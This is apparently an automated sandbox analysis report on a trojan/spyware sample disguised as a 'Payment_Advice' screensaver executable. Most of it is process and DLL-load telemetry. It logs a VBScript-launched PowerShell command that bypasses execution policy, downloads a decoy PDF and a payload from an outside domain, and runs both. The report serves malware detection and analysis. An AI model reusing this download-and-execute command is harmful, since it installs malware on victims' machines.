Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, -O-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Payment_Advice.scr.exe.50e0000.4.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: Payment_Advice.scr.exe, ---.cs	Suspicious method names: ._FFFD_DB8E_DF92.InjectEvent
Source: Payment_Advice.scr.exe, -.cs	Suspicious method names: ._FFFD.InjectEvent
Source: Payment_Advice.scr.exe, -----.cs	Suspicious method names: ._065A_FFFD_065A_FFFD_032E.InjectEvent
Source: Payment_Advice.scr.exe, --.cs	Suspicious method names: ._1CFC_05B4.InjectEvent

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@28/55@9/7

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Code function: 2_2_00402762 LoadResource,SizeofResource,FreeResource,

2_2_00402762

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.scr.exe.log

Jump to behavior

Source: C:\Windows\Temp\hadvices.scr	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

File created: C:\Users\user\AppData\Local\Temp\4A6C.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo

Source: Payment_Advice.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment_Advice.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hadvices.scr, 00000010.00000002.3360095396.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D15000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3364579165.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000010.00000002.3360095396.0000000002D09000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment_Advice.scr.exe	Virustotal: Detection: 58%
Source: Payment_Advice.scr.exe	ReversingLabs: Detection: 52%

Source: Payment_Advice.scr.exe

String found in binary or memory: -Additional exception information unavailable.

Source: unknown	Process created: C:\Users\user\Desktop\Payment_Advice.scr.exe "C:\Users\user\Desktop\Payment_Advice.scr.exe"
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Users\user\Desktop\Payment_Advice.scr.exe "C:\Users\user\Desktop\Payment_Advice.scr.exe"
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S
Source: C:\Windows\Temp\hadvices.scr	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Users\user\Desktop\Payment_Advice.scr.exe "C:\Users\user\Desktop\Payment_Advice.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Temp\hadvices.scr	Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
